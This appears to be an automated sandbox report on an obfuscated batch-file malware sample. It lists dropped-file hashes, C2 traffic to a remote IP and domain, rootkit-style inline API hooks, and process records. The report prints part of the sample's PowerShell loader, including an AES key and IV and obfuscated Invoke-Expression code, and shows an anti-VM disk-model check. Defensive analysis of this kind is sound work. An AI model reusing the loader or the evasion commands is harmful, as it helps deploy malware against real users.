                                                        MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                                        SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                                        SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                                        SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.165454452307923
                                                        Encrypted:false
                                                        SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                                        MD5:B6B6F199DA64422984403D7374F32528
                                                        SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                                        SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                                        SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.8519554794255333
                                                        Encrypted:false
                                                        SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                                        MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                                        SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                                        SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                                        SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.1642919553794224
                                                        Encrypted:false
                                                        SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                                        MD5:D7EECF043241FDB9486580582E208603
                                                        SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                                        SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                                        SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.611480364194825
                                                        Encrypted:false
                                                        SSDEEP:384:BhVMpYQMdYJMdYwMsOM6UMmMWaMJMbMcMEMBMkM7MQMrMBYQM5JMg0dMtMnMS8Mq:BOFCRbf+GkoeiDpbH
                                                        MD5:F7CBF10547CD1D43490830916EC54BAA
                                                        SHA1:C252BAF129424AB1416D8BE19D45D3FB97A806BB
                                                        SHA-256:E0466E5DE3C691AABE630128BB0337B444475D0DF1328B389F57AFAE3459089B
                                                        SHA-512:77E8A4DC89BCE00E9A9E5FAE96CBF403BE45976C89E13F8A0C8C41BA4646F79BBD33B332D9F2F11BB519186513B525145E603E42D71D8374A18F67CD5CF9BC3C
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.1787704450569538
                                                        Encrypted:false
                                                        SSDEEP:384:khL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmqAUm:kY7Lv
                                                        MD5:30C8639676FC18AD4DD91F57C68DE4BF
                                                        SHA1:036B5574A8C22C4CF272515BF36367D92703894A
                                                        SHA-256:8FA1621B5F3777ABB820E7B6E265FDCBA2CBEE2BAC0FF1D48884DBA5743B896B
                                                        SHA-512:8090825C343D0291E490F2E05549B5650F698A45D4E0188041A0811B283E9FE9A65060C77F8A888DCE82A380220E2847286D3D3D70DB94CF883F2DA0C01E2082
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.2040973025675846
                                                        Encrypted:false
                                                        SSDEEP:48:MltW4vsrP+MZQNRBEZWTENO4bpBkof4df/6FgVt:uD6KNVaO80ofef/6Fg
                                                        MD5:D3068F76AB8B5C986CE0CD4F214A25AA
                                                        SHA1:A68E70F39380931E35AE987036A75B7B6634220E
                                                        SHA-256:826C500714315CF43735691AABD8B559F85C763EE5FC5DC058E4873A2FEFB19E
                                                        SHA-512:EDFCC59A58FA1CECF401D2CC58955846A4E80056BB592986D8BE35E14F8CBABD9F78E2EE03FC11C722FBDDB32AA9CB61AAF5F17C544D8587935086B4F0842F08
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.6469884746870727
                                                        Encrypted:false
                                                        SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                                        MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                                        SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                                                        SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                                        SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.4105971138868307
                                                        Encrypted:false
                                                        SSDEEP:768:Yla0NnaaEarafana7abava3anaDa7a7ajaB1aPa7aDabanananaHa7ajaTa7aPaa:cNl
                                                        MD5:FC0BAB49ED66704837893A81C7CD2BBB
                                                        SHA1:9A31E152427CBA778CC7895CC77EAAD18A56D9D0
                                                        SHA-256:5B9AD00E45B47DFBFA58F6C5F11B09FC38BE99ACE2DAAEDE0C6F199580FFAD93
                                                        SHA-512:956A4BE70B816D12F0FAD4AD740CD0C5745F0A5676155E846CDDC6086822720428D8F79116C885D5A36684D17291E7006E52C235CB4EF362F43D310074CBC352
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.3132453844344478
                                                        Encrypted:false
                                                        SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                                        MD5:6237EE0458A0478242B975E9BB7AA97D
                                                        SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                                        SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                                        SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.325262033408211
                                                        Encrypted:false
                                                        SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                                        MD5:D13189B45679E53F5744A4D449F8B00F
                                                        SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                                        SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                                        SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.7947046118743749
                                                        Encrypted:false
                                                        SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                                        MD5:55E73A924B170FBFFF862E8E195E839A
                                                        SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                                                        SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                                        SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):66808
                                                        Entropy (8bit):4.3658295704348555
                                                        Encrypted:false
                                                        SSDEEP:384:NgRYNkBxxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8RT:N3NwxA8nPLGbKNj
                                                        MD5:470541D95F1FC08759E8F2DFE12F6CE4
                                                        SHA1:A70EB7B3EC5682AE241E30900060DB71D3E4A218
                                                        SHA-256:81E038AB1A91B694863827EE8A36814FE8883A512B26637A3606D37B37787C68
                                                        SHA-512:E7C5576F49C0DCF55A567C65CC45393BC9655FACF9CB935E89EA32D5CFAF9C3A2CEA0E2BC0C3520A5E8DD54F9BC4BBD0E5965889324F1D758E848D4626429A0C
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.273338343434408
                                                        Encrypted:false
                                                        SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                                        MD5:C37372EB51AEDB4552CB839C7294403A
                                                        SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                                        SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                                        SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.231195890775603
                                                        Encrypted:false
                                                        SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                                        MD5:3365A34953FD7B16667108A049B64DA5
                                                        SHA1:C72421A58E063D64072152344B266F8306A78702
                                                        SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                                                        SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.350637590276604
                                                        Encrypted:false
                                                        SSDEEP:384:Ih+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBww:IOqabeGTnbuSx8
                                                        MD5:354A2904520E9FD0C611B4EBDD7385AE
                                                        SHA1:DECBFBB01430B8612EFB17A35801707A52E15E28
                                                        SHA-256:21FDE075C0EB7A2BC2081AC1A89DA92C8C91C7080C19E246CA0B527C814A3AD5
                                                        SHA-512:4C0C0B831D03F23E6CE54154E30351C74BFD43EB82986425A4EAAC79401075F9F5057D305DCB46AA9C5C238CC24A8D88C493FBF4CE460F253941E3466EB25E62
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.421206160086997
                                                        Encrypted:false
                                                        SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                                        MD5:67CAD90771EBC0BD20736201D89C1586
                                                        SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                                        SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                                        SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):68120
                                                        Entropy (8bit):4.32761041402411
                                                        Encrypted:false
                                                        SSDEEP:384:IuFREuFRromlonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo10:HNJJa1ZGg6ULyhf
                                                        MD5:B5049BF19208C345EE552F79F700BF9B
                                                        SHA1:F3B16565C3C1256E530D0042655D9302E0039E15
                                                        SHA-256:FF5A3C02053AA8E027797201ABB5A81D4179DB3B062B4A8ABF1BFB77FCD549B1
                                                        SHA-512:410F6C75DA9CEADF28199B029A0E7C888462FE4CFE63751CE887FE078D7A370CB20C859A9C0126B1EAC4EB28FA24C8E0819A6417505A4F1C850C54C1094E1301
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):69616
                                                        Entropy (8bit):4.385074666859093
                                                        Encrypted:false
                                                        SSDEEP:384:3FRL8AFRL8Vsd9WhE1gHUnVlGY/eD+A4NuRfnDfaEfuQLRuLGLW7eJvGAgXZIpUf:1H8UeuXnLmLQXHmtpJnqiNHpzoQp
                                                        MD5:3FDE910CB6B762A59680A039657BF25C
                                                        SHA1:3FD65C18B0F41607CA79D88CE799CCDF5F0933B9
                                                        SHA-256:B905820651EE4DFE63CD83B9762508CCF3FE8A8CEA9CA8B9A41ED80CB7AB1BC7
                                                        SHA-512:D9EE405BC5248203BDAE4DFA60031D4F17E82FBCE9F6EC1F64469715829E826F5BD966EB9410CF9F4A6CB9DA4F46AB466E16182D9313BE2F4D389EF36FE795D1
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):15064
                                                        Entropy (8bit):3.8034400020267225
                                                        Encrypted:false
                                                        SSDEEP:192:b2jceB+ypybynyM/yIyHia0J+Qha/ngxuI:bQc5EY0X/nqpRo5
                                                        MD5:60191A6ED6F36F0660A1177AD47B455C
                                                        SHA1:E4E659C229F1400F710C26CECB31F131DC8FF7F3
                                                        SHA-256:BFF82F0CC57CB9EE3D2217E1DCCE2A02C65CFAF33E4D78B5BB163CD1EE54E40D
                                                        SHA-512:8194C6B8953C41F887F4550D0C5FC38B74163764C951293C64537A08E5DD47A75C9CD2BA627E31123E2C0890B63532E1FC3D32AA7242E15C4B8BADDAC3771B51
                                                        Malicious:false
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines (2183), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2386
                                                        Entropy (8bit):5.705668288544162
                                                        Encrypted:false
                                                        SSDEEP:48:9JFHDRtmRosRBRxpB3RRKB3a3ul2tEoq69dsMiZ1d2gqnio2Un2Uu2Ui+:PFHDRtmOsz7pBBRKBkcP69G5qnio2s2h
                                                        MD5:A4FA26BDA70CF3BB2B2A7EEFA945B4EE
                                                        SHA1:14EF6BFEEE580A06975C38B7B9AE0D0BF48AF599
                                                        SHA-256:B2A5890D7AFA127A3B75F7F27A1A54B23C67CC3D36BDFA3C7ADA859C94868F9D
                                                        SHA-512:F396839A34FD7046283647C411AEB99BBE3F98D00D055B5B9FA7B65FC93B4939714F832AFB05F2BC536F7301060167F05FC6E0ACFD8B9A6053CE8B7D7140E5B3
                                                        Malicious:false
                                                        Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function aQLUy($yReKm){.$FiuGL=[System.Security.Cryptography.Aes]::Create();.$FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24=');.$FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA==');.$exYAh=$FiuGL.CreateDecryptor();.$YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length);.$exYAh.Dispose();.$FiuGL.Dispose();.$YgVOo;}function mFHoz($yReKm){.Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', '');.Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', '');.Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re
                                                        File type:DOS batch file, ASCII text, with very long lines (3511), with CRLF line terminators
                                                        Entropy (8bit):6.017050343783169
                                                        TrID:
                                                        • BibTeX references (5501/1) 100.00%
                                                        File name:x.bat
                                                        File size:7'312'129 bytes
                                                        MD5:3839596a3f33711abce263e7d890b2e9
                                                        SHA1:185a35a99a20422843725342c374ebae76b76fdc
                                                        SHA256:ac0c9ad2975e52b69068d331e25c0f7e1aaa2976651794b1eeadf5a3529bcaf0
                                                        SHA512:d00d7bb5f7cdbea678b03a312df249f2f7550462a7e81151e7db960c8f05d61d91b4ba03f89bf107d8419540897b056408fd21a68b408f122aa9906a9a1f348a
                                                        SSDEEP:49152:wDYqqQ9PgglFCYjq3HsyU+CwUp7B+Li23ovqJ+dwvnP/SRqRIEIS1x3KMb/ASHc0:h
                                                        TLSH:867633613BD82EDF491EC62ED016BD2E23D74FA1989DA4C2C7D136830B5EB639A15C13
                                                        File Content Preview:@echo off..%RKvQjzEhGUtCzoCqSvuaYKSBifusrwnQWHuUlxqUJiLDfoFwJELgAXS%@%RUIeelQjHDGRTIeuf%%rQZpvTzYIMLgqYPncrPlPyrBWCIOCbzqbZGbh%e%yOFfDdyAmHcGFNFTLTyysTlLwGnufqsNfzSaGJUo%%wpaMVvMLhoND%c%kEDUJWQeuVpoBfUEmcYkvVDkYAlAJXcEkvpnwMZYxXbuKxu%%RgUmPsnobsViLpvxSKdf
                                                        Icon Hash:9686878b929a9886
                                                        Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                                                        Dec 13, 2024 13:40:32.716829062 CET  49736        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:40:32.837080002 CET  4782         49736      103.230.121.81  192.168.2.4
                                                        Dec 13, 2024 13:40:32.837198973 CET  49736        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:40:32.866866112 CET  49736        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:40:32.986726046 CET  4782         49736      103.230.121.81  192.168.2.4
                                                        Dec 13, 2024 13:40:35.511522055 CET  4782         49736      103.230.121.81  192.168.2.4
                                                        Dec 13, 2024 13:40:35.511718988 CET  49736        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:40:35.518270969 CET  49736        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:40:35.638056993 CET  4782         49736      103.230.121.81  192.168.2.4
                                                        Dec 13, 2024 13:41:21.493244886 CET  49819        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:41:22.507673979 CET  49819        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:41:24.523298979 CET  49819        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:41:28.523338079 CET  49819        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:41:36.523335934 CET  49819        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:41:45.901159048 CET  49826        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:41:46.913923979 CET  49826        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:41:48.929656029 CET  49826        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:41:52.945255995 CET  49826        4782       192.168.2.4     103.230.121.81
                                                        Dec 13, 2024 13:42:00.945224047 CET  49826        4782       192.168.2.4     103.230.121.81
                                                        Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                                                        Dec 13, 2024 13:40:32.384555101 CET  62823        53         192.168.2.4  1.1.1.1
                                                        Dec 13, 2024 13:40:32.708169937 CET  53           62823      1.1.1.1      192.168.2.4
                                                        Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name           Type            Class        DNS over HTTPS
                                                        Dec 13, 2024 13:40:32.384555101 CET  192.168.2.4  1.1.1.1  0xc408    Standard query (0)  iam.nigga.dad  A (IP address)  IN (0x0001)  false
                                                        Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name           CName  Address         Type            Class        DNS over HTTPS
                                                        Dec 13, 2024 13:40:32.708169937 CET  1.1.1.1    192.168.2.4  0xc408    No error (0)  iam.nigga.dad         103.230.121.81  A (IP address)  IN (0x0001)  false

                                                        Code Manipulations

                                                        Function Name                  Hook Type  Active in Processes
                                                        ZwEnumerateKey                 INLINE     explorer.exe, winlogon.exe
                                                        NtQuerySystemInformation       INLINE     explorer.exe, winlogon.exe
                                                        ZwResumeThread                 INLINE     explorer.exe, winlogon.exe
                                                        NtDeviceIoControlFile          INLINE     explorer.exe, winlogon.exe
                                                        ZwDeviceIoControlFile          INLINE     explorer.exe, winlogon.exe
                                                        NtEnumerateKey                 INLINE     explorer.exe, winlogon.exe
                                                        NtQueryDirectoryFile           INLINE     explorer.exe, winlogon.exe
                                                        ZwEnumerateValueKey            INLINE     explorer.exe, winlogon.exe
                                                        ZwQuerySystemInformation       INLINE     explorer.exe, winlogon.exe
                                                        NtResumeThread                 INLINE     explorer.exe, winlogon.exe
                                                        RtlGetNativeSystemInformation  INLINE     explorer.exe, winlogon.exe
                                                        NtQueryDirectoryFileEx         INLINE     explorer.exe, winlogon.exe
                                                        NtEnumerateValueKey            INLINE     explorer.exe, winlogon.exe
                                                        ZwQueryDirectoryFileEx         INLINE     explorer.exe, winlogon.exe
                                                        ZwQueryDirectoryFile           INLINE     explorer.exe, winlogon.exe
                                                        Function Name                  Hook Type  New Data
                                                        ZwEnumerateKey                 INLINE     0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQuerySystemInformation       INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        ZwResumeThread                 INLINE     0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        NtDeviceIoControlFile          INLINE     0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        ZwDeviceIoControlFile          INLINE     0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        NtEnumerateKey                 INLINE     0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQueryDirectoryFile           INLINE     0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        ZwEnumerateValueKey            INLINE     0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQuerySystemInformation       INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtResumeThread                 INLINE     0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        RtlGetNativeSystemInformation  INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtQueryDirectoryFileEx         INLINE     0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        NtEnumerateValueKey            INLINE     0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQueryDirectoryFileEx         INLINE     0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        ZwQueryDirectoryFile           INLINE     0xE9 0x9A 0xA3 0x32 0x2B 0xBF
Function Name                  Hook Type  New Data
ZwEnumerateKey                 INLINE     0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation       INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                 INLINE     0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile          INLINE     0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile          INLINE     0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                 INLINE     0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile           INLINE     0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey            INLINE     0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation       INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                 INLINE     0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation  INLINE     0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx         INLINE     0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey            INLINE     0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx         INLINE     0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile           INLINE     0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                        Target ID:0
                                                        Start time:07:39:58
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" "
                                                        Imagebase:0x7ff6a4070000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:07:39:58
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:07:39:58
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wmic diskdrive get Model
                                                        Imagebase:0x7ff640220000
                                                        File size:576'000 bytes
                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:07:39:58
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\findstr.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                                                        Imagebase:0x7ff6903c0000
                                                        File size:36'352 bytes
                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:07:39:59
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
